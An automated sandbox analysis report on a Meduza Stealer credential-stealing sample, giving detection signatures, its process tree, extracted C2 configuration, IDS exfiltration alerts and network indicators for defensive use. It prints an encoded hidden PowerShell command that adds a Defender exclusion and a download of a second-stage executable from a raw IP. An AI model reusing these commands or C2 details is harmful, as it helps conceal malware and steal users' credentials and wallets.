Edit tour

Windows Analysis Report
9RM52QaURq.exe

Overview

General Information

Sample name:	9RM52QaURq.exe renamed because original name is a hash value
Original sample name:	ca53439dbc9699e109a1810227c124dadca4066758511727be95e57b8ce3bc0f.exe
Analysis ID:	1556367
MD5:	9913a016528f9d9c4aac737c6a06c596
SHA1:	197435ebdeab5f6df6e10d1c5aec40812cb9dfdf
SHA256:	ca53439dbc9699e109a1810227c124dadca4066758511727be95e57b8ce3bc0f
Tags:	45-130-145-152exeuser-JAMESWT_MHT
Infos:

Detection

CredGrabber, Meduza Stealer

Score:	93
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected CredGrabber

Yara detected Meduza Stealer

AI detected suspicious sample

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query locales information (e.g. system language)

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Queries time zone information

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Execution of Powershell with Base64

Suricata IDS alerts with low severity for network traffic

Terminates after testing mutex exists (may check infected machine status)

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

9RM52QaURq.exe (PID: 988 cmdline: "C:\Users\user\Desktop\9RM52QaURq.exe" MD5: 9913A016528F9D9C4AAC737C6A06C596)

powershell.exe (PID: 4888 cmdline: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 616 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

wbfTHB1mDB.exe (PID: 4616 cmdline: "C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe" MD5: 183E24B654414D7BE786CCD8E6A108A5)

cleanup

Malware Configuration

Threatname: Meduza Stealer

{"C2 url": "45.130.145.152", "grabber_max_size": 4194304, "anti_vm": true, "anti_dbg": true, "self_destruct": false, "extensions": ".txt;.doc;.docx;.pdf;.xls;.xlsx;.log;.db;.sqlite", "build_name": "Work", "links": "", "port": 15666}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.2650409439.0000018C89C20000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
Process Memory Space: wbfTHB1mDB.exe PID: 4616	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
Process Memory Space: wbfTHB1mDB.exe PID: 4616	JoeSecurity_CredGrabber	Yara detected CredGrabber	Joe Security
Process Memory Space: wbfTHB1mDB.exe PID: 4616	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.wbfTHB1mDB.exe.18c89a10000.0.unpack	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
8.2.wbfTHB1mDB.exe.18c89a10000.0.raw.unpack	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA, CommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9RM52QaURq.exe", ParentImage: C:\Users\user\Desktop\9RM52QaURq.exe, ParentProcessId: 988, ParentProcessName: 9RM52QaURq.exe, ProcessCommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA, ProcessId: 4888, ProcessName: powershell.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA, CommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9RM52QaURq.exe", ParentImage: C:\Users\user\Desktop\9RM52QaURq.exe, ParentProcessId: 988, ParentProcessName: 9RM52QaURq.exe, ProcessCommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA, ProcessId: 4888, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA, CommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9RM52QaURq.exe", ParentImage: C:\Users\user\Desktop\9RM52QaURq.exe, ParentProcessId: 988, ParentProcessName: 9RM52QaURq.exe, ProcessCommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA, ProcessId: 4888, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T10:36:32.156044+0100	2049441	1	A Network Trojan was detected	192.168.2.6	49920	45.130.145.152	15666	TCP

ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T10:36:32.156044+0100	2050806	1	A Network Trojan was detected	192.168.2.6	49920	45.130.145.152	15666	TCP
2024-11-15T10:36:32.161151+0100	2050806	1	A Network Trojan was detected	192.168.2.6	49920	45.130.145.152	15666	TCP

ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T10:36:32.156044+0100	2050807	1	A Network Trojan was detected	192.168.2.6	49920	45.130.145.152	15666	TCP
2024-11-15T10:36:32.161151+0100	2050807	1	A Network Trojan was detected	192.168.2.6	49920	45.130.145.152	15666	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 8.2.wbfTHB1mDB.exe.18c89a10000.0.raw.unpack

Malware Configuration Extractor: Meduza Stealer {"C2 url": "45.130.145.152", "grabber_max_size": 4194304, "anti_vm": true, "anti_dbg": true, "self_destruct": false, "extensions": ".txt;.doc;.docx;.pdf;.xls;.xlsx;.log;.db;.sqlite", "build_name": "Work", "links": "", "port": 15666}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: 9RM52QaURq.exe

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.1% probability

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A81EA0 CryptUnprotectData,LocalFree,	8_2_0000018C89A81EA0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A45EE0 CryptUnprotectData,LocalFree,	8_2_0000018C89A45EE0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A821C0 CryptProtectData,LocalFree,	8_2_0000018C89A821C0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AE2098 CryptProtectData,	8_2_0000018C89AE2098
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AE2090 CryptUnprotectData,	8_2_0000018C89AE2090

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49924 version: TLS 1.2

Source: 9RM52QaURq.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\outgl\source\repos\Installer_sharp\obj\Release\Installer_sharp.pdb source: 9RM52QaURq.exe
Source:	Binary string: C:\Users\outgl\source\repos\Installer_sharp\obj\Release\Installer_sharp.pdb8 source: 9RM52QaURq.exe

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AC98C0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	8_2_0000018C89AC98C0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AC9810 FindClose,FindFirstFileExW,GetLastError,	8_2_0000018C89AC9810
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AE20F8 FindFirstFileW,	8_2_0000018C89AE20F8

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89A913B0 GetLogicalDriveStringsW,

8_2_0000018C89A913B0

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: D:\sources\migration\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: D:\sources\replacementmanifests\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: D:\sources\migration\wtr\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	File opened: D:\sources\replacementmanifests\hwvid-migration-2\	Jump to behavior

Source: C:\Users\user\Desktop\9RM52QaURq.exe

Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h

0_2_07572768

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049441 - Severity 1 - ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt : 192.168.2.6:49920 -> 45.130.145.152:15666
Source: Network traffic	Suricata IDS: 2050806 - Severity 1 - ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2 : 192.168.2.6:49920 -> 45.130.145.152:15666

Source: global traffic

TCP traffic: 192.168.2.6:49920 -> 45.130.145.152:15666

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 15 Nov 2024 09:35:55 GMTContent-Type: application/octet-streamContent-Length: 2632704Last-Modified: Thu, 14 Nov 2024 19:32:03 GMTConnection: keep-aliveETag: "67365033-282c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 54 97 d1 e9 35 f9 82 e9 35 f9 82 e9 35 f9 82 f9 b1 fa 83 e1 35 f9 82 f9 b1 fd 83 e6 35 f9 82 f9 b1 fc 83 ba 35 f9 82 a2 4d fc 83 48 35 f9 82 a2 4d fa 83 ee 35 f9 82 a2 4d fd 83 fa 35 f9 82 d1 b5 fc 83 eb 35 f9 82 a1 b0 fd 83 cd 35 f9 82 a2 4d f8 83 e2 35 f9 82 e9 35 f8 82 68 35 f9 82 a2 b0 f0 83 fa 35 f9 82 a2 b0 06 82 e8 35 f9 82 a2 b0 fb 83 e8 35 f9 82 52 69 63 68 e9 35 f9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 e8 4f 34 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 6a 03 00 00 d6 24 00 00 00 00 00 f0 d0 02 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 28 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 e6 27 00 64 00 00 00 00 60 28 00 e0 01 00 00 00 30 28 00 70 2c 00 00 00 00 00 00 00 00 00 00 00 70 28 00 50 09 00 00 00 96 27 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 94 27 00 40 01 00 00 00 00 00 00 00 00 00 00 00 80 03 00 08 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 70 24 00 00 80 03 00 00 72 24 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 cc 28 00 00 00 00 28 00 00 12 00 00 00 e0 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 70 2c 00 00 00 30 28 00 00 2e 00 00 00 f2 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 60 28 00 00 02 00 00 00 20 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 09 00 00 00 70 28 00 00 0a 00 00 00 22 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; /Host: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /brozer.exe HTTP/1.1Host: 150.241.95.163Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 45.130.145.152 45.130.145.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

ASN Name: ASBAXETNRU ASBAXETNRU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic

Suricata IDS: 2050807 - Severity 1 - ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP) : 192.168.2.6:49920 -> 45.130.145.152:15666

Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89A8E9F0 recv,recv,closesocket,WSACleanup,

8_2_0000018C89A8E9F0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; /Host: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /brozer.exe HTTP/1.1Host: 150.241.95.163Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: api.ipify.org

Source: 9RM52QaURq.exe, 00000000.00000002.3244715340.0000000003119000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://150.241.95.163
Source: 9RM52QaURq.exe, 00000000.00000002.3244715340.0000000003081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://150.241.95.163/brozer.exe
Source: 9RM52QaURq.exe	String found in binary or memory: http://150.241.95.163/brozer.exeIError
Source: 9RM52QaURq.exe, 00000000.00000002.3244715340.0000000003081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://150.241.95.163/brozer.exeP
Source: powershell.exe, 00000003.00000002.2425118889.0000000007170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microl
Source: wbfTHB1mDB.exe, 00000008.00000003.2573211700.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2572700015.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2566218670.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2573951993.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2566698140.0000018C8815D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: wbfTHB1mDB.exe, 00000008.00000003.2646197791.0000018C8A3B0000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2646219845.0000018C8A3B0000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2570343179.0000018C8A3A1000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2646539344.0000018C8A3B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.microsoft.t/Regi
Source: powershell.exe, 00000003.00000002.2418547237.0000000005B05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.2415906158.0000000004BF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2415287116.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2415906158.0000000004CD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
